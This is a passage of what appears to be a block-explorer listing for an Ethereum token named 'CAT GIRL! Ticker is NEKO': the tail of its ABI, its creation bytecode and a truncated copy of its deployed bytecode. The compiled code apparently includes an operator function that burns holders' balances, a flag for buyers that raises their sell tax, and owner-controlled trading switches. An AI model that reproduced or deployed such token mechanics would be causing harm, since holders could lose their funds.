IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"token","type":"address"}],"name":"withdrawTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"wl","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
600680546001600160a01b03191673c40087fa8164c05ca3ab6909d78fb0d64ad88bb417905560e0604052601860a09081527f434154204749524c21205469636b6572206973204e454b4f000000000000000060c0526008906200006490826200060c565b506040805180820190915260048152634e454b4f60e01b60208201526009906200008f90826200060c565b50600a80546001600160a01b03191661dead179055612710620000c16c08b5833183b990037b5b4000006003620006ee565b620000cd91906200070e565b600b556103e8620000ed6c08b5833183b990037b5b4000006014620006ee565b620000f991906200070e565b600c556103e8620001196c08b5833183b990037b5b4000006014620006ee565b6200012591906200070e565b600d556010805462ffffff19169055678ac7230489e8000060115560016014818155601591909155601655601880546001600160a01b0319167351487fcf17f4e2449b5a4f0b715bc059a04bf7631790553480156200018357600080fd5b506008805462000193906200057e565b80601f0160208091040260200160405190810160405280929190818152602001828054620001c1906200057e565b8015620002125780601f10620001e65761010080835404028352916020019162000212565b820191906000526020600020905b815481529060010190602001808311620001f457829003601f168201915b50505050506009805462000226906200057e565b80601f016020809104026020016040519081016040528092919081815260200182805462000254906200057e565b8015620002a55780601f106200027957610100808354040283529160200191620002a5565b820191906000526020600020905b8154815290600101906020018083116200028757829003601f168201915b50505050508160039081620002bb91906200060c565b506004620002ca82826200060c565b505050620002e7620002e16200044760201b60201c565b6200044b565b62000300336c08b5833183b990037b5b4000006200049d565b60128054600360ff1991821617909155737a250d5630b4cf539739df2c5dacb4c659f2488d6080526005546001600160a01b039081166000908152600f60209081526040808320805486166001908117909155600680548616855282852080548816831790553080865283862080548916841790557f7e98db1b893d503d049bbf1a3858119b9172e4b74989a91dfee4165dd9ce42a88054891684179055601880548816875284872080548a1685179055600a80548916885285882080548b1686179055600e9096527f37836a7135fae77e265e35732c70286035736c8b57b12590769780e067ead81c80548a16851790559086528386208054891684179055935486168552828520805488168317905533855282852080548816831790555485168452818420805487168217905591549093168252919020805490921617905562000747565b3390565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b038216620004f85760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b80600260008282546200050c919062000731565b90915550506001600160a01b038216600081815260208181526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b505050565b634e487b7160e01b600052604160045260246000fd5b600181811c908216806200059357607f821691505b602082108103620005b457634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200056357600081815260208120601f850160051c81016020861015620005e35750805b601f850160051c820191505b818110156200060457828155600101620005ef565b505050505050565b81516001600160401b0381111562000628576200062862000568565b62000640816200063984546200057e565b84620005ba565b602080601f8311600181146200067857600084156200065f5750858301515b600019600386901b1c1916600185901b17855562000604565b600085815260208120601f198616915b82811015620006a95788860151825594840194600190910190840162000688565b5085821015620006c85787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b600052601160045260246000fd5b8082028115828204841417620007085762000708620006d8565b92915050565b6000826200072c57634e487b7160e01b600052601260045260246000fd5b500490565b80820180821115620007085762000708620006d8565b608051611f3c62000794600039600081816102d901528181610731015281816107c2015281816108d9015281816109020152818161195f01528181611a170152611aac0152611f3c6000f3fe6080604052600436106102085760003560e01c8063715018a611610118578063aa4bde28116100a0578063e5b37a651161006f578063e5b37a65146105ab578063ef437ff5146105db578063f2fde38b146105fb578063fb201b1d1461061b578063fca675a81461063057600080fd5b8063aa4bde281461053f578063b61b64fa14610555578063badb1df11461056b578063dd62ed3e1461058b57600080fd5b806395d89b41116100e757806395d89b41146104c05780639865d01a146104d5578063a014f37d146104ea578063a457c2d7146104ff578063a9059cbb1461051f57600080fd5b8063715018a6146104475780638baa82491461045c5780638c0b5e221461048c5780638da5cb5b146104a257600080fd5b80632fee9e7e1161019b5780633eb5d9b21161016a5780633eb5d9b2146103bc57806349bd5a5e146103d257806349df728c146103f257806354b762a61461041257806370a082311461042757600080fd5b80632fee9e7e1461033a578063313ce5671461036a57806333ee179314610386578063395093511461039c57600080fd5b80631694505e116101d75780631694505e146102c757806318160ddd146102fb57806323b872dd146103105780632896a77d1461033057600080fd5b806303fd2a45146102145780630445b6671461025157806306fdde0314610275578063095ea7b31461029757600080fd5b3661020f57005b600080fd5b34801561022057600080fd5b50600a54610234906001600160a01b031681565b6040516001600160a01b0390911681526020015b60405180910390f35b34801561025d57600080fd5b50610267600b5481565b604051908152602001610248565b34801561028157600080fd5b5061028a610657565b6040516102489190611b20565b3480156102a357600080fd5b506102b76102b2366004611b83565b6106e9565b6040519015158152602001610248565b3480156102d357600080fd5b506102347f000000000000000000000000000000000000000000000000000000000000000081565b34801561030757600080fd5b50600254610267565b34801561031c57600080fd5b506102b761032b366004611baf565b610703565b610338610727565b005b34801561034657600080fd5b506102b7610355366004611bf0565b600f6020526000908152604090205460ff1681565b34801561037657600080fd5b5060405160128152602001610248565b34801561039257600080fd5b5061026760155481565b3480156103a857600080fd5b506102b76103b7366004611b83565b6109e1565b3480156103c857600080fd5b5061026760145481565b3480156103de57600080fd5b50600754610234906001600160a01b031681565b3480156103fe57600080fd5b5061033861040d366004611bf0565b610a03565b34801561041e57600080fd5b506102b7610af5565b34801561043357600080fd5b50610267610442366004611bf0565b610b3c565b34801561045357600080fd5b50610338610b57565b34801561046857600080fd5b506102b7610477366004611bf0565b60176020526000908152604090205460ff1681565b34801561049857600080fd5b50610267600c5481565b3480156104ae57600080fd5b506005546001600160a01b0316610234565b3480156104cc57600080fd5b5061028a610b6b565b3480156104e157600080fd5b50610338610b7a565b3480156104f657600080fd5b506102b7610b9a565b34801561050b57600080fd5b506102b761051a366004611b83565b610bc1565b34801561052b57600080fd5b506102b761053a366004611b83565b610c41565b34801561054b57600080fd5b50610267600d5481565b34801561056157600080fd5b5061026760135481565b34801561057757600080fd5b50610338610586366004611bf0565b610c4f565b34801561059757600080fd5b506102676105a6366004611c14565b610c9b565b3480156105b757600080fd5b506102b76105c6366004611bf0565b600e6020526000908152604090205460ff1681565b3480156105e757600080fd5b506103386105f6366004611c5b565b610cc6565b34801561060757600080fd5b50610338610616366004611bf0565b610cf9565b34801561062757600080fd5b50610338610d6f565b34801561063c57600080fd5b5060125461064a9060ff1681565b6040516102489190611c9f565b60606003805461066690611cc7565b80601f016020809104026020016040519081016040528092919081815260200182805461069290611cc7565b80156106df5780601f106106b4576101008083540402835291602001916106df565b820191906000526020600020905b8154815290600101906020018083116106c257829003601f168201915b5050505050905090565b6000336106f7818585610de2565b60019150505b92915050565b600033610711858285610f06565b61071c858585610f80565b506001949350505050565b61072f6114e9565b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801561078d573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906107b19190611d01565b6001600160a01b031663c9c65396307f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801561081e573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906108429190611d01565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af115801561088f573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906108b39190611d01565b600780546001600160a01b0319166001600160a01b0392909216919091179055610900307f0000000000000000000000000000000000000000000000000000000000000000600019610de2565b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663f305d719343061093a30610b3c565b60008061094f6005546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af11580156109b7573d6000803e3d6000fd5b50505050506040513d601f19601f820116820180604052508101906109dc9190611d1e565b505050565b6000336106f78185856109f48383610c9b565b6109fe9190611d62565b610de2565b610a0b6114e9565b6006546040516370a0823160e01b81523060048201526001600160a01b038381169263a9059cbb9291169083906370a0823190602401602060405180830381865afa158015610a5e573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610a829190611d75565b6040516001600160e01b031960e085901b1681526001600160a01b03909216600483015260248201526044016020604051808303816000875af1158015610acd573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610af19190611d8e565b5050565b6006546013546040516000926001600160a01b03169180156108fc029184818181858888f19350505050158015610b30573d6000803e3d6000fd5b50506000601355600190565b6001600160a01b031660009081526020819052604090205490565b610b5f6114e9565b610b696000611543565b565b60606004805461066690611cc7565b610b826114e9565b6c08b5833183b990037b5b400000600c819055600d55565b6000610ba46114e9565b506012805460ff1916600317905560006014819055601555600190565b60003381610bcf8286610c9b565b905083811015610c345760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b61071c8286868403610de2565b6000336106f7818585610f80565b610c57611595565b6001600160a01b0381166000908152600f60205260409020805460ff19169055601154610c98908290610c8982610b3c565b610c939190611dab565b611604565b50565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b610cce6114e9565b6001600160a01b03919091166000908152600f60205260409020805460ff1916911515919091179055565b610d016114e9565b6001600160a01b038116610d665760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610c2b565b610c9881611543565b610d776114e9565b601054610100900460ff1615610dcf5760405162461bcd60e51b815260206004820152601a60248201527f54726164696e6720697320616c726561647920656e61626c65640000000000006044820152606401610c2b565b6010805462ffff00191662010100179055565b6001600160a01b038316610e445760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610c2b565b6001600160a01b038216610ea55760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610c2b565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6000610f128484610c9b565b90506000198114610f7a5781811015610f6d5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610c2b565b610f7a8484848403610de2565b50505050565b6001600160a01b038316610fa65760405162461bcd60e51b8152600401610c2b90611dbe565b6001600160a01b038216610fcc5760405162461bcd60e51b8152600401610c2b90611e03565b6001600160a01b0383166000908152600e602052604090205460ff1615801561100e57506001600160a01b0382166000908152600e602052604090205460ff16155b1561106057601054610100900460ff166110605760405162461bcd60e51b8152602060048201526013602482015272151c98591a5b99c81b9bdd08195b98589b1959606a1b6044820152606401610c2b565b6001600160a01b0383166000908152600f602052604090205460ff161580156110a257506001600160a01b0382166000908152600f602052604090205460ff16155b156111b7576007546001600160a01b038381169116146111b757600c548111156111345760405162461bcd60e51b815260206004820152603d60248201527f45524332303a207472616e7366657220616d6f756e742065786365656473207460448201527f6865206d6178207472616e73616374696f6e20616d6f756e74206265660000006064820152608401610c2b565b600d5461114083610b3c565b61114a9083611d62565b11156111b75760405162461bcd60e51b815260206004820152603660248201527f45524332303a2062616c616e636520616d6f756e74206578636565646564206d604482015275185e081dd85b1b195d08185b5bdd5b9d081b1a5b5a5d60521b6064820152608401610c2b565b6001600160a01b0383166000908152600e6020526040902054819060ff161580156111fb57506001600160a01b0383166000908152600e602052604090205460ff16155b156114de576007546001600160a01b038581169116148061122957506007546001600160a01b038481169116145b1561146757600c548211156112a65760405162461bcd60e51b815260206004820152603960248201527f45524332303a207472616e7366657220616d6f756e742065786365656473207460448201527f6865206d6178207472616e73616374696f6e20616d6f756e74000000000000006064820152608401610c2b565b6007546001600160a01b0385811691161480156112dc57506001600160a01b0383166000908152600f602052604090205460ff16155b80156112f157506001600160a01b0384163014155b1561136f57600060125460ff16600381111561130f5761130f611c89565b03611338576001600160a01b0383166000908152601760205260409020805460ff191660011790555b600060646014548461134a9190611e46565b6113549190611e5d565b9050611361853083611736565b61136b8184611dab565b9150505b6007546001600160a01b0384811691161480156113a557506001600160a01b0384166000908152600f602052604090205460ff16155b80156113ba57506001600160a01b0383163014155b80156113ce575060105462010000900460ff165b80156113dd575060105460ff16155b15611462576015546001600160a01b03851660009081526017602052604090205460ff16151560010361140f57506016545b6010805460ff19166001179055611424611860565b6010805460ff191690556000606461143c8386611e46565b6114469190611e5d565b9050611453863083611736565b61145d8185611dab565b925050505b6114de565b6001600160a01b03841660009081526017602052604090205460ff16151560011480156114a257506007546001600160a01b03848116911614155b156114de5760006064601654846114b99190611e46565b6114c39190611e5d565b90506114d0853083611736565b6114da8184611dab565b9150505b610f7a848483611736565b6005546001600160a01b03163314610b695760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610c2b565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6006546001600160a01b0316336001600160a01b031614610b695760405162461bcd60e51b815260206004820152602360248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f706572616044820152623a37b960e91b6064820152608401610c2b565b6001600160a01b0382166116645760405162461bcd60e51b815260206004820152602160248201527f45524332303a206275726e2066726f6d20746865207a65726f206164647265736044820152607360f81b6064820152608401610c2b565b6001600160a01b038216600090815260208190526040902054818110156116d85760405162461bcd60e51b815260206004820152602260248201527f45524332303a206275726e20616d6f756e7420657863656564732062616c616e604482015261636560f01b6064820152608401610c2b565b6001600160a01b0383166000818152602081815260408083208686039055600280548790039055518581529192917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a3505050565b6001600160a01b03831661175c5760405162461bcd60e51b8152600401610c2b90611dbe565b6001600160a01b0382166117825760405162461bcd60e51b8152600401610c2b90611e03565b6001600160a01b038316600090815260208190526040902054818110156117fa5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610c2b565b6001600160a01b03848116600081815260208181526040808320878703905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a3610f7a565b61186930610b3c565b60000361187257565b60008061187e30610b3c565b600654909150479060009061189b906001600160a01b0316610b3c565b90506000600b54841115611901574792506118b7846000611908565b6118c18347611dab565b9450600b548211156118e957806118d95760006118db565b845b6118e59086611e5d565b6013555b84601360008282546118fb9190611d62565b90915550505b5050505050565b604080516002808252606082018352600092602083019080368337019050509050308160008151811061193d5761193d611e7f565b60200260200101906001600160a01b031690816001600160a01b0316815250507f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156119bb573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906119df9190611d01565b816001815181106119f2576119f2611e7f565b6001600160a01b03928316602091820292909201015260405163095ea7b360e01b81527f000000000000000000000000000000000000000000000000000000000000000090911660048201526000196024820152309063095ea7b3906044016020604051808303816000875af1158015611a70573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611a949190611d8e565b5060405163791ac94760e01b81526001600160a01b037f0000000000000000000000000000000000000000000000000000000000000000169063791ac94790611ae99086908690869030904290600401611e95565b600060405180830381600087803b158015611b0357600080fd5b505af1158015611b17573d6000803e3d6000fd5b50505050505050565b600060208083528351808285015260005b81811015611b4d57858101830151858201604001528201611b31565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b0381168114610c9857600080fd5b60008060408385031215611b9657600080fd5b8235611ba181611b6e565b946020939093013593505050565b600080600060608486031215611bc457600080fd5b8335611bcf81611b6e565b92506020840135611bdf81611b6e565b929592945050506040919091013590565b600060208284031215611c0257600080fd5b8135611c0d81611b6e565b9392505050565b60008060408385031215611c2757600080fd5b8235611c3281611b6e565b91506020830135611c4281611b6e565b809150509250929050565b8015158114610c9857600080fd5b60008060408385031215611c6e57600080fd5b8235611c7981611b6e565b91506020830135611c4281611c4d565b634e487b7160e01b600052602160045260246000fd5b6020810160048310611cc157634e487b7160e01b600052602160045260246000fd5b91905290565b600181811c90821680611cdb57607f821691505b602082108103611cfb57634e487b7160e01b600052602260045260246000fd5b50919050565b600060208284031215611d1357600080fd5b8151611c0d81611b6e565b600080600060608486031215611d3357600080fd5b8351925060208401519150604084015190509250925092565b634e487b7160e01b600052601160045260246000fd5b808201808211156106fd576106fd611d4c565b600060208284031215611d8757600080fd5b5051919050565b600060208284031215611da057600080fd5b8151611c0d81611c4d565b818103818111156106fd576106fd611d4c565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b80820281158282048414176106fd576106fd611d4c565b600082611e7a57634e487b7160e01b600052601260045260246000fd5b500490565b634e487b7160e01b600052603260045260246000fd5b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b81811015611ee55784516001600160a01b031683529383019391830191600101611ec0565b50506001600160a01b0396909616606085015250505060800152939250505056fea2646970667358221220a023ef38f18864b50687ac7aebdb9194bf78f79ca1e60e4f854655f6fc0276f164736f6c63430008130033
Deployed Bytecode
0x6080604052600436106102085760003560e01c8063715018a611610118578063aa4bde28116100a0578063e5b37a651161006f578063e5b37a65146105ab578063ef437ff5146105db578063f2fde38b146105fb578063fb201b1d1461061b578063fca675a81461063057600080fd5b8063aa4bde281461053f578063b61b64fa14610555578063badb1df11461056b578063dd62ed3e1461058b57600080fd5b806395d89b41116100e757806395d89b41146104c05780639865d01a146104d5578063a014f37d146104ea578063a457c2d7146104ff578063a9059cbb1461051f57600080fd5b8063715018a6146104475780638baa82491461045c5780638c0b5e221461048c5780638da5cb5b146104a257600080fd5b80632fee9e7e1161019b5780633eb5d9b21161016a5780633eb5d9b2146103bc57806349bd5a5e146103d257806349df728c146103f257806354b762a61461041257806370a082311461042757600080fd5b80632fee9e7e1461033a578063313ce5671461036a57806333ee179314610386578063395093511461039c57600080fd5b80631694505e116101d75780631694505e146102c757806318160ddd146102fb57806323b872dd146103105780632896a77d1461033057600080fd5b806303fd2a45146102145780630445b6671461025157806306fdde0314610275578063095ea7b31461029757600080fd5b3661020f57005b600080fd5b34801561022057600080fd5b50600a54610234906001600160a01b031681565b6040516001600160a01b0390911681526020015b60405180910390f35b34801561025d57600080fd5b50610267600b5481565b604051908152602001610248565b34801561028157600080fd5b5061028a610657565b6040516102489190611b20565b3480156102a357600080fd5b506102b76102b2366004611b83565b6106e9565b6040519015158152602001610248565b3480156102d357600080fd5b506102347f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d81565b34801561030757600080fd5b50600254610267565b34801561031c57600080fd5b506102b761032b366004611baf565b610703565b610338610727565b005b34801561034657600080fd5b506102b7610355366004611bf0565b600f6020526000908152604090205460ff1681565b34801561037657600080fd5b5060405160128152602001610248565b34801561039257600080fd5b5061026760155481565b3480156103a857600080fd5b506102b76103b7366004611b83565b6109e1565b3480156103c857600080fd5b5061026760145481565b3480156103de57600080fd5b50600754610234906001600160a01b031681565b3480156103fe57600080fd5b5061033861040d366004611bf0565b610a03565b34801561041e57600080fd5b506102b7610af5565b34801561043357600080fd5b50610267610442366004611bf0565b610b3c565b34801561045357600080fd5b50610338610b57565b34801561046857600080fd5b506102b7610477366004611bf0565b60176020526000908152604090205460ff1681565b34801561049857600080fd5b50610267600c5481565b3480156104ae57600080fd5b506005546001600160a01b0316610234565b3480156104cc57600080fd5b5061028a610b6b565b3480156104e157600080fd5b50610338610b7a565b3480156104f657600080fd5b506102b7610b9a565b34801561050b57600080fd5b506102b761051a366004611b83565b610bc1565b34801561052b57600080fd5b506102b761053a366004611b83565b610c41565b34801561054b57600080fd5b50610267600d5481565b34801561056157600080fd5b5061026760135481565b34801561057757600080fd5b50610338610586366004611bf0565b610c4f565b34801561059757600080fd5b506102676105a6366004611c14565b610c9b565b3480156105b757600080fd5b506102b76105c6366004611bf0565b600e6020526000908152604090205460ff1681565b3480156105e757600080fd5b506103386105f6366004611c5b565b610cc6565b34801561060757600080fd5b50610338610616366004611bf0565b610cf9565b34801561062757600080fd5b50610338610d6f565b34801561063c57600080fd5b5060125461064a9060ff1681565b6040516102489190611c9f565b60606003805461066690611cc7565b80601f016020809104026020016040519081016040528092919081815260200182805461069290611cc7565b80156106df5780601f106106b4576101008083540402835291602001916106df565b820191906000526020600020905b8154815290600101906020018083116106c257829003601f168201915b5050505050905090565b6000336106f7818585610de2565b60019150505b92915050565b600033610711858285610f06565b61071c858585610f80565b506001949350505050565b61072f6114e9565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801561078d573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906107b19190611d01565b6001600160a01b031663c9c65396307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801561081e573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906108429190611d01565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af115801561088f573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906108b39190611d01565b600780546001600160a01b0319166001600160a01b0392909216919091179055610900307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d600019610de2565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663f305d719343061093a30610b3c565b60008061094f6005546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af11580156109b7573d6000803e3d6000fd5b50505050506040513d601f19601f820116820180604052508101906109dc9190611d1e565b505050565b6000336106f78185856109f48383610c9b565b6109fe9190611d62565b610de2565b610a0b6114e9565b6006546040516370a0823160e01b81523060048201526001600160a01b038381169263a9059cbb9291169083906370a0823190602401602060405180830381865afa158015610a5e573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610a829190611d75565b6040516001600160e01b031960e085901b1681526001600160a01b03909216600483015260248201526044016020604051808303816000875af1158015610acd573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610af19190611d8e565b5050565b6006546013546040516000926001600160a01b03169180156108fc029184818181858888f19350505050158015610b30573d6000803e3d6000fd5b50506000601355600190565b6001600160a01b031660009081526020819052604090205490565b610b5f6114e9565b610b696000611543565b565b60606004805461066690611cc7565b610b826114e9565b6c08b5833183b990037b5b400000600c819055600d55565b6000610ba46114e9565b506012805460ff1916600317905560006014819055601555600190565b60003381610bcf8286610c9b565b905083811015610c345760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b61071c8286868403610de2565b6000336106f7818585610f80565b610c57611595565b6001600160a01b0381166000908152600f60205260409020805460ff19169055601154610c98908290610c8982610b3c565b610c939190611dab565b611604565b50565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b610cce6114e9565b6001600160a01b03919091166000908152600f60205260409020805460ff1916911515919091179055565b610d016114e9565b6001600160a01b038116610d665760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610c2b565b610c9881611543565b610d776114e9565b601054610100900460ff1615610dcf5760405162461bcd60e51b815260206004820152601a60248201527f54726164696e6720697320616c726561647920656e61626c65640000000000006044820152606401610c2b565b6010805462ffff00191662010100179055565b6001600160a01b038316610e445760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610c2b565b6001600160a01b038216610ea55760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610c2b565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6000610f128484610c9b565b90506000198114610f7a5781811015610f6d5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610c2b565b610f7a8484848403610de2565b50505050565b6001600160a01b038316610fa65760405162461bcd60e51b8152600401610c2b90611dbe565b6001600160a01b038216610fcc5760405162461bcd60e51b8152600401610c2b90611e03565b6001600160a01b0383166000908152600e602052604090205460ff1615801561100e57506001600160a01b0382166000908152600e602052604090205460ff16155b1561106057601054610100900460ff166110605760405162461bcd60e51b8152602060048201526013602482015272151c98591a5b99c81b9bdd08195b98589b1959606a1b6044820152606401610c2b565b6001600160a01b0383166000908152600f602052604090205460ff161580156110a257506001600160a01b0382166000908152600f602052604090205460ff16155b156111b7576007546001600160a01b038381169116146111b757600c548111156111345760405162461bcd60e51b815260206004820152603d60248201527f45524332303a207472616e7366657220616d6f756e742065786365656473207460448201527f6865206d6178207472616e73616374696f6e20616d6f756e74206265660000006064820152608401610c2b565b600d5461114083610b3c565b61114a9083611d62565b11156111b75760405162461bcd60e51b815260206004820152603660248201527f45524332303a2062616c616e636520616d6f756e74206578636565646564206d604482015275185e081dd85b1b195d08185b5bdd5b9d081b1a5b5a5d60521b6064820152608401610c2b565b6001600160a01b0383166000908152600e6020526040902054819060ff161580156111fb57506001600160a01b0383166000908152600e602052604090205460ff16155b156114de576007546001600160a01b038581169116148061122957506007546001600160a01b038481169116145b1561146757600c548211156112a65760405162461bcd60e51b815260206004820152603960248201527f45524332303a207472616e7366657220616d6f756e742065786365656473207460448201527f6865206d6178207472616e73616374696f6e20616d6f756e74000000000000006064820152608401610c2b565b6007546001600160a01b0385811691161480156112dc57506001600160a01b0383166000908152600f602052604090205460ff16155b80156112f157506001600160a01b0384163014155b1561136f57600060125460ff16600381111561130f5761130f611c89565b03611338576001600160a01b0383166000908152601760205260409020805460ff191660011790555b600060646014548461134a9190611e46565b6113549190611e5d565b9050611361853083611736565b61136b8184611dab565b9150505b6007546001600160a01b0384811691161480156113a557506001600160a01b0384166000908152600f602052604090205460ff16155b80156113ba57506001600160a01b0383163014155b80156113ce575060105462010000900460ff165b80156113dd575060105460ff16155b15611462576015546001600160a01b03851660009081526017602052604090205460ff16151560010361140f57506016545b6010805460ff19166001179055611424611860565b6010805460ff191690556000606461143c8386611e46565b6114469190611e5d565b9050611453863083611736565b61145d8185611dab565b925050505b6114de565b6001600160a01b03841660009081526017602052604090205460ff16151560011480156114a257506007546001600160a01b03848116911614155b156114de5760006064601654846114b99190611e46565b6114c39190611e5d565b90506114d0853083611736565b6114da8184611dab565b9150505b610f7a848483611736565b6005546001600160a01b03163314610b695760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610c2b565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6006546001600160a01b0316336001600160a01b031614610b695760405162461bcd60e51b815260206004820152602360248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f706572616044820152623a37b960e91b6064820152608401610c2b565b6001600160a01b0382166116645760405162461bcd60e51b815260206004820152602160248201527f45524332303a206275726e2066726f6d20746865207a65726f206164647265736044820152607360f81b6064820152608401610c2b565b6001600160a01b038216600090815260208190526040902054818110156116d85760405162461bcd60e51b815260206004820152602260248201527f45524332303a206275726e20616d6f756e7420657863656564732062616c616e604482015261636560f01b6064820152608401610c2b565b6001600160a01b0383166000818152602081815260408083208686039055600280548790039055518581529192917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a3505050565b6001600160a01b03831661175c5760405162461bcd60e51b8152600401610c2b90611dbe565b6001600160a01b0382166117825760405162461bcd60e51b8152600401610c2b90611e03565b6001600160a01b038316600090815260208190526040902054818110156117fa5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610c2b565b6001600160a01b03848116600081815260208181526040808320878703905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a3610f7a565b61186930610b3c565b60000361187257565b60008061187e30610b3c565b600654909150479060009061189b906001600160a01b0316610b3c565b90506000600b54841115611901574792506118b7846000611908565b6118c18347611dab565b9450600b548211156118e957806118d95760006118db565b845b6118e59086611e5d565b6013555b84601360008282546118fb9190611d62565b90915550505b5050505050565b604080516002808252606082018352600092602083019080368337019050509050308160008151811061193d5761193d611e7f565b60200260200101906001600160a01b031690816001600160a01b0316815250507f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156119bb573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906119df9190611d01565b816001815181106119f2576119f2611e7f565b6001600160a01b03928316602091